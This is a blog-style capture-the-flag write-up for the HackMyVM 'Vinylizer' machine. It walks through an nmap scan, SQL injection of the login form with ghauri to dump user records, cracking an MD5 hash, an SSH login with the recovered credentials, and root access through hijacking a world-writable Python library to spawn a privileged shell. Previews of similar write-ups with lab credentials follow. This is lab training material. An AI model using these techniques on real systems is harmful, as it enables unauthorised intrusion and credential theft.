HackMyVm : Vinylizer

Vinylizer

OS : Debian

IP : 172.20.10.3

Nmap :

└─$ nmap -sC -sV 172.20.10.3
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-04 18:11 EST
Nmap scan report for 172.20.10.3
Host is up (0.00023s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 f8:e3:79:35:12:8b:e7:41:d4:27:9d:97:a5:14:b6:16 (ECDSA)
|_  256 e3:8b:15:12:6b:ff:97:57:82:e5:20:58:2d:cb:55:33 (ED25519)
80/tcp open  http    Apache httpd 2.4.52 ((Ubuntu))
|_http-title: Vinyl Records Marketplace
|_http-server-header: Apache/2.4.52 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.86 seconds

Port 80 Enumeration :

Visited : http://172.20.10.3/
Homepage

The login page is there…

Login page

Intercepted the login request using burp suite

Intercepting the login request

Lets save the burp request and run the sqlmap or ghauri to check if any database vulnerabilities are there or not.

$ ghauri -r req -p username - dbs
Databases

There are three databses available.

Lets dump the vinyl_marketplace.

Tables in vinyl_marketplace db

In the database vinyl_marketplace, there is a one table called users.

$ ghauri -r req -p username - dbms mysql -D vinyl_marketplace -T users - dump
Reading the vinyl_marketplace

Got one hashed password for username shopadmin and plaintext for lana.

Lets try to decrypt the hash using hashcat…

$ hashcat -a 0 -m 0 "9432522ed1a8fca612b11c3980a031f6" tools/rockyou.txt.gz - show

9432522ed1a8fca612b11c3980a031f6 : addicted2vinyl

Cracking the hash

Lets try the ssh login using the credentials

shopadmin : addicted2vinyl

SSH Login

Great, we are shopadmin now.

Privilege Escalation :

To search for file with having writing permission,

$find / -type f -writable 2>/dev/null

And we will see that we have 777 permission in /usr/lib/python3.10/random.py-rwxrwxrwx 1 root root 33221 Nov 20 15:14 /usr/lib/python3.10/random.py

Lets use python library hijacking, by modifying the library code to execute /bin/bash -p

Edited random.py

After that, simply run the vinylizer.py using python3

Executing vinylizer.py

Boom! Rooted….. 

Comments

Post a Comment

Popular posts from this blog

HackMyVm : Hostname

Image
 HackMyVm : Hostname OS: Debian Web-Technology: IP: 192.168.1.154 USERS: → po CREDENTIALS (ANY): → po : !ts-bl4nk Flags: → user.txt : REDUCTED → root.txt : REDUCTED ========================================================================= NMAP RESULTS:      22 /tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)      | ssh-hostkey:      | 3072 27:71:24:58:d3:7c:b3:8a:7b:32:49:d1:c8:0b:4c:ba (RSA)      | 256 e2:30:67:38:7b:db:9a:86:21:01:3e:bf:0e:e7:4f:26 (ECDSA)      |_ 256 5d:78:c5:37:a8:58:dd:c4:b6:bd:ce:b5:ba:bf:53:dc (ED25519)      80 /tcp open http nginx 1.18.0      |_http-server-header: nginx/1.18.0      |_http-title: Panda      Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ========================================================================= Web Services Enumeration: → Visited  http://192.168....
Read more

HackMyVm : Away

Image
 HackMyVm : Away OS: Debian Web-Technology: IP: 192.168.1.39 USERS: → lula → passphrase : Theclockisticking ========================================================================= NMAP RESULTS:      22 /tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)      | ssh-hostkey:      | 3072 f1:87:03:41:21:12:ef:80:3c:8f:07:2f:8b:3c:6e:2a (RSA)      | 256 5f:f9:ca:19:0d:74:65:2c:97:4a:36:a4:04:7c:9b:bd (ECDSA)      |_ 256 39:a4:b3:38:94:c5:d2:77:07:a1:dd:b4:2f:0a:5a:44 (ED25519)      80 /tcp open http nginx 1.18.0      |_http-title: Site doesn't have a title (text/html).      |_http-server-header: nginx/1.18.0      Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel ========================================================================= Web Services Enumeration: → Visited http://192.168.1.39 ⇒  ⇒ “tula” can be a ssh user....
Read more

HackMyVm : Translator Writeup

Image
  Hackmyvm: Translator OS: Debian Web-Technology: IP: 192.168.1.83 Flag: ⇒ user flag : REDUCTED ⇒ root flag : REDUCTED USERS: ⇒ india ⇒ ocean CREDENTIALS (ANY): ⇒ ocean : ayurv3d4 ========================================================================= NMAP RESULTS:      22/ tcp open ssh OpenSSH 8.4p1 Debian 5 (protocol 2.0)      | ssh-hostkey:      | 3072 08:cf:50:b2:4f:41:43:c4:66:56:ce:96:b9:04:8c:77 (RSA)      | 256 40:b7:11:24:76:59:cd:e0:79:db:71:d1:39:29:d5:45 (ECDSA)      |_ 256 44:64:ba:b8:52:4f:ca:00:dd:3e:c3:28:71:6f:77:76 (ED25519)      80/ tcp open http nginx 1.18.0      |_http-server-header: nginx/1.18.0      |_http-title: Site doesn't have a title (text/html).      Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel =======================================================...
Read more